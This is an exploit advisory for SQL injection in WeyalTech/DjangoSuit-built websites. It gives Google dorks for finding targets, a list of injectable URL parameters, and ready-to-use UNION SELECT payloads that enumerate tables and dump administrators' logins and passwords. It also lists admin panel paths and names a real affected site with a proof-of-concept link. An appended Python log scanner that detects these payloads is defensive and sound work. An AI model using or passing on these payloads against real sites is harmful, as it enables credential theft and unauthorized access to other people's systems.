#################################################################################################
# Exploit Title : Designed By WeyalTech Developed By DjangoSuit Company SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/07/2018
# Vendor Homepages : weyaltech.com ~ djangosuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Another Title : Designed by WeyalTech DjangoSuit Web Development Company Afghanistan SQL Injection Vulnerability
# Google Dorks :
intext:''Designed by WeyalTech''
intext:''Copyright © 2013 DjangoSuit.com''
intext:''Developed by DjangoSuit.com''
# Exploits :
/fullstory.php?id=[SQL Inj]
/images.php?im_album_id=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]
/category.php?CatID=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]
/images.php?im_album_id=[SQL Inj]
/category.php?CatID=[SQL Inj]
/videos.php?vidcat=[SQL Inj]
/video_fullstory.php?vidid=[SQL Inj]
Below is the manual SQL injection attack scenario =>
Check the database version =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--%20-
Check the table names in the database =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()--%20-
Check the column names of a table in the database =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x7573657273--%20-
Check the administrators' / owners' login names and passwords =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
Administration Control Panel Paths =>
/cp/login.php
/admin/login/?next=/admin/
#################################################################################################
# Example Site => rohi.af/fullstory.php?id=68456%27 => [ Proof of Concept ] => archive.is/xJm1D
# SQL Database Errors =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
You're seeing this error because you have DEBUG = True in your Django settings file.
Change that to False, and Django will display a standard page generated by the handler for this status code. #68456
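Detection example (added here, not part of the original advisory or of the vendor's code): the Python script below scans web access log lines for the endpoints and parameters listed above and flags any value that is not a plain integer, raising severity when SQL keywords or a quote appear. It assumes combined-format access logs and that every listed parameter is meant to carry a numeric ID; the function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint -> parameters named in the advisory; assumed to carry integer IDs only.
NUMERIC_PARAMS = {
    "/fullstory.php": {"id"},
    "/images.php": {"im_album_id", "limit", "nxt"},
    "/category.php": {"CatID", "limit", "nxt"},
    "/videos.php": {"vidcat"},
    "/video_fullstory.php": {"vidid"},
}
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers that raise severity once a value is already known to be non-numeric.
SQL_HINT_RE = re.compile(r"union\s+select|information_schema|group_concat|--|'", re.I)

def check_line(line):
    """Return (path, param, decoded_value, severity) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    params = NUMERIC_PARAMS.get(url.path)
    if not params:
        return []
    findings = []
    # parse_qsl percent-decodes and turns '+' into a space, as the server does.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in params and not re.fullmatch(r"\d{1,10}", value):
            sev = "high" if SQL_HINT_RE.search(value) else "review"
            findings.append((url.path, name, value, sev))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2018:10:00:01 +0000] "GET /fullstory.php?id=68456 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Jul/2018:10:00:05 +0000] "GET /fullstory.php?id=68456%27 HTTP/1.1" 500 312',
    '192.0.2.77 - - [04/Jul/2018:10:00:09 +0000] "GET /fullstory.php?id=-68456+union+select+1,2,version()--%20- HTTP/1.1" 200 4800',
    '192.0.2.10 - - [04/Jul/2018:10:00:12 +0000] "GET /category.php?CatID=3&limit=10&nxt=20 HTTP/1.1" 200 7300',
    '192.0.2.77 - - [04/Jul/2018:10:00:15 +0000] "GET /category.php?CatID=3&limit=10&nxt=abc HTTP/1.1" 200 900',
]

def scan(lines):
    return [f for line in lines for f in check_line(line)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches a parameterized query, closes the injection point that this check only detects.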
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################